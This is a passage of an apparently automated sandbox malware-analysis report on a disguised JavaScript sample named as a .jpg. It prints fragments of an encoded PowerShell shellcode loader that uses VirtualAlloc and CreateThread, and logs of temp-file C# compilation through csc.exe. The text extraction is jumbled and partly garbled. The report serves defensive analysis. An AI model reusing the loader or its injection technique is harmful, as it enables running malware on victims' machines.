wahganwa1acwamab4aguazqasadaaeabjadmaowakahmaaqb6aguaiaa9aca AMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgAIAA tagcadaagadaaeaaxadaamaawackaewakahmaaqb6aguaiaa9acaajabzagm ALgBMAGUAbgBnAHQAaAB9ADsAJAB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQB saeeababsagaywaoadaalaawahgamqawadaamaasacqacwbpahoazqasada AeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA oacqacwbjac4atablag4azwb0aggalqaxackaowakagkakwarackaiab7acq AdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgB UAGASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHMAYwBbACQAaQBdACw AIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAA wacwamaasacqaeaasadaalaawacwamaapadsazgbvahiaiaaoadsaowapahs AUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA= Imagebase: File size: MD5 hash: Has administrator privileges: Programmed in: Reputation: 0x222d bytes 92F44E405DB16AC55D97E3BFE3B132FA true.net C# or VB.NET high File Activities File Created Copyright Joe Security LLC 201 Page 17 of 21

18 File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\onkbqua.tmp read attributes synchronize generic write none synchronous io non alert non directory file open no recall success or wait CreateFileW C:\Users\user\AppData\Local\Temp\onkbqua.0.cs read attributes synchronize generic write none synchronous io non alert non directory file open no recall success or wait CreateFileW C:\Users\user\AppData\Local\Temp\onkbqua.dll read attributes synchronize generic read generic write none synchronous io non alert non directory file open no recall success or wait CreateFileW C:\Users\user\AppData\Local\Temp\onkbqua.cmdline read attributes synchronize generic write none synchronous io non alert non directory file open no recall success or wait CreateFileW C:\Users\user\AppData\Local\Temp\onkbqua.out read attributes synchronize generic write none synchronous io non alert non directory file open no recall success or wait CreateFileW C:\Users\user\AppData\Local\Temp\onkbqua.err read attributes synchronize generic write none synchronous io non alert non directory file open no recall success or wait CreateFileW File Deleted File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\onkbqua.0.cs success or wait DeleteFileW C:\Users\user\AppData\Local\Temp\onkbqua.tmp success or wait DeleteFileW C:\Users\user\AppData\Local\Temp\onkbqua.cmdline success or wait DeleteFileW C:\Users\user\AppData\Local\Temp\onkbqua.dll success or wait DeleteFileW Old File Path New File Path Completion Count Address Symbol File Written File Path Offset Length Value Ascii Completion Count C:\Users\user\AppData\Local\Temp\onkbqua.0.cs unknown 557 ef bb bf e d 3b 0a e d 2e e d 65 2e 49 6e f b 0a 0a 6e 61 6d e e f 6e 73 0a 7b 0a c c e a b 0a b 44 6c 6c 49 6d 70 6f b e 65 6c e 64 6c 6c d c e e c 41 6c 6c 6f e c c e a 65 2c e c 41 6c 6c 6f f 6e c e c f b 5b...using System;.using System. Runtime.InteropServices;.. namespace Win32Functions.{. public class Win32. {. [Dll Import("kernel32.dll")]publi c static extern IntPtr VirtualAlloc(IntPtr lpaddress, uint dwsize, uint flallocationtype, uint flprotect);[ Address Symbol success or wait B WriteFile Copyright Joe Security LLC 201 Page 1 of 21

19 File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\onkbqua.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69.../t:library /utfoutput /R:" success or wait B WriteFile f f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 System.dll" /R:"C:\Windows\ass embly\gac_msil\system. Manageme nt.automation\ bf35 6ad364e35\System.Manag ement.automation.dll" /out:"c:\users\u ser\appdata\local\temp\o nkbqua.dll" /D:DEBUG /debug+ /optimize- 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f a a 5c c c b e 5c c 4c 6f c 5c d 70 5c 6f 6e 3 6b e 64 6c 6c f 44 3a f b 20 2f 6f d 69 7a 65 2d 20 C:\Users\user\AppData\Local\Temp\onkbqua.out unknown 422 ef bb bf 43 3a 5c C:\Users\user\Desktop> success or wait B WriteFile c c b e 5c b 74 6f 70 3e a 5c e 64 6f c 4d 69 "C:\ Windows\Microsoft.NET\Fr amewor k\v \csc.exe" /t:library /utfoutput /R:"System.dll" f 73 6f e /R:"C:\Windows\assembly\ 4e c d f 72 6b 5c e 30 2e c e f 74 3a 6c f GAC_M SIL\System.Management. Automati on\ bf356ad36 4e35\S ystem.management.autom ation.dll" /o 3 6f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f File Read File Path Offset Length Completion Count Address C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 4095 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 6304 success or wait 3 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 4106 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v \CONFIG\security.config.cch unknown 4 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v \CONFIG\enterprisesec.config.cch unknown 4 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 4095 success or wait 1 6C9EF210 ReadFile Copyright Joe Security LLC 201 Page 19 of 21 Symbol

ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version:

ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version: ID: 371 Sample Name: 21PO201745.jpg...js Cookbook: default.jbs Time: 14:32:0 Date: 21/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence